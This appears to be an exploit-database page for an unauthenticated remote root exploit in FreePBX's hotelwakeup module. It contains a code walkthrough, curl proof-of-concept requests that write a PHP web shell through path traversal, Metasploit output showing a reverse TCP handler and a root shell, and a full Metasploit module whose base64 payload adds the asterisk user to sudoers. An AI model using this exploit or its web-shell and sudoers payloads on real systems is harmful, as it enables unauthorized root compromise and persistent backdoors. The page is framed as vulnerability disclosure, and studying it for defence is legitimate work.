Freepbx < 13.0.188 , Remote root exploit
CVE
Category
Price
Severity
CVE-2018-17525
CWE-77
N/A
Critical
Author
Risk
Exploitation Type
Date
Metin Yunus Kandemir
High
Remote
2016-09-28
CPE
cpe:cpe:/a:freepbx:freepbx:13.0.188
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction None UI The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016090207 Below is a copy:
Freepbx < 13.0.188 , Remote root exploit #Title : Freepbx < 13.0.188 , Remote root exploit
#Vulnerable software : Freepbx < 13.0.188
#Author : Ahmed Sultan (0x4148)
#Email : [email protected]
#Current software status : patch released
#Vendor : Sangoma <freepbx.org>
=begin
Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking
Technical details
Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php
Line 102 :
public function generateCallFile($foo) {
...............................
if (empty($foo['filename'])) {
$foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable
}
...........................
// Delete any old .call file with the same name as the one we are creating.
if(file_exists($outfile) ) {
unlink($outfile);
}
// Create up a .call file, write and close
$wuc = fopen($tempfile, 'w');
fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" );
fputs( $wuc, "maxretries: ".$foo['maxretries']."\n");
fputs( $wuc, "retrytime: ".$foo['retrytime']."\n");
fputs( $wuc, "waittime: ".$foo['waittime']."\n");
fputs( $wuc, "callerid: ".$foo['callerid']."\n");
fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable
fputs( $wuc, "application: ".$foo['application']."\n");
fputs( $wuc, "data: ".$foo['data']."\n");
fclose( $wuc );
..........................
The ext value can be manipulated by the attacker to change the output file path
the language value can be manipulated by the attacket to load in malicious contents
Function is called at
Line 94 :
public function addWakeup($destination, $time, $lang) {
$date = $this->getConfig(); // module config provided by user
$this->generateCallFile(array(
"time" => $time,
"date" => 'unused',
"ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field]
"language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code]
"maxretries" => $date['maxretries'],
"retrytime" => $date['retrytime'],
"waittime" => $date['waittime'],
"callerid" => $date['cnam']." <".$date['cid'].">",
"application" => 'AGI',
"data" => 'wakeconfirm.php',
));
}
addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command
Line 60 :
switch($_REQUEST['command']) {
case "savecall":
if(empty($_POST['language'])) {
$lang = 'en'; //default to English if empty
} else {
$lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<===========================
}
............................................
if ($badtime) {
// abandon .call file creation and pop up a js alert to the user
return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup)));
} else {
$this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<=======================
return array("status" => true);
}
.................................
POC :
[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
{"error":{"type":"Whoops\Exception\ErrorException","message":"touch(): Unable to create file /var/spool/asterisk/tmp/wuc.1475613328.ext./../../../../../../var/www/html/0x4148.php.call because No such file or directory","file":"/var/www/html/admin/modules/hotelwakeup/Hotelwakeup.class.php","line":238}}#
The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call
the server will ignore.call extn and will execute the php
[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call"
channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm
maxretries: 3
retrytime: 60
waittime: 60
callerid: Wake Up Calls <*68>
set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
uid=499(asterisk) gid=498(asterisk) groups=498(asterisk)
application: AGI
data: wakeconfirm.php
Privelage can be escalated via adding the asterisk user to sudoers which can be done manually
then echo a > /var/spool/asterisk/sysadmin/amportal_restart
sleeping for few seconds
then sudo bash -i
MSF OUTPUT
msf > use exploit/fpbx
msf exploit(fpbx) > set RHOST 68.170.92.50
RHOST => 68.170.92.50
msf exploit(fpbx) > set RPORT 8080
RPORT => 8080
msf exploit(fpbx) > exploit
[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . .
[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload
[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed
[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell <taking around 20 seconds in case of success>
id
uid=0(root) gid=0(root) groups=0(root)
sh -i
sh: no job control in this shell
sh-4.1# pwd
pwd
/var/www/html
sh-4.1# whoami
whoami
root
sh-4.1#
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'FreePBX < 13.0.188.1 Remote root exploit',
'Description' => '
This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup
',
'License' => MSF_LICENSE,
'Author' =>
[
'Ahmed sultan (0x4148) <[email protected] >', # discovery of vulnerability and msf module
],
'References' =>
[
"NA"
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl telnet python'
}
},
'Platform' => %w(linux unix),
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'Privileged' => 'false',
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 27 2016'))
end
def print_status(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
def print_error(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
def print_good(msg = '')
super("#{rhost}:#{rport} - #{msg}")
end
# Application Check
def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'headers' => {
'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"
},
'vars_post' => {
'module' => 'hotelwakeup',
'command' => 'savecall'
}
)
unless res
vprint_error('Connection timed out.')
end
if res.body.include? "Referrer"
vprint_good("Hotelwakeup module detected")
return Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
vprint_status('Sending payload . . .')
pwn = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
'headers' => {
'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
'User-agent' => "mostahter ;)"
},
'vars_post' => {
'module' => 'hotelwakeup',
'command' => 'savecall',
'day' => 'now',
'time' => '+1 week',
'destination' => '/../../../../../../var/www/html/0x4148.php',
'language' => '<?php echo "0x4148@r1z";if($_GET['r1zcmd']!=''){system("sudo ".$_GET['r1zcmd']);}else{fwrite(fopen("0x4148.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCmltcG9ydCBvcwppbXBvcnQgdGltZQojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLSAKY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXAoJJ05PUEFTU1dEXDpBTEwiXD5cPlwvZXRjXC9zdWRvZXJzL2dcJyAvdmFyL2xpYi8nIFwKCSdhc3Rlcmlzay9iaW4vZnJlZXBieF9lbmdpbmUnCm9zLnN5c3RlbShjbWQpCm9zLnN5c3RlbSgnZWNobyBhID4gL3Zhci9zcG9vbC9hc3Rlcmlzay9zeXNhZG1pbi9hbXBvcnRhbF9yZXN0YXJ0JykKdGltZS5zbGVlcCgyMCk="));system("python 0x4148.py");}?>',
}
)
#vprint_status("#{pwn}")
vprint_status('Trying to execute payload <taking around 20 seconds in case of success>')
escalate = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
'vars_get' => {
'0x4148' => "r1z"
}
)
if escalate.body.include? "0x4148@r1z"
vprint_good("Payload executed")
vprint_status("Spawning root shell")
killit = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '0x4148.php.call'),
'vars_get' => {
'r1zcmd' => "#{payload.encoded}"
}
)
else
vprint_error("Exploitation Failed")
end
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum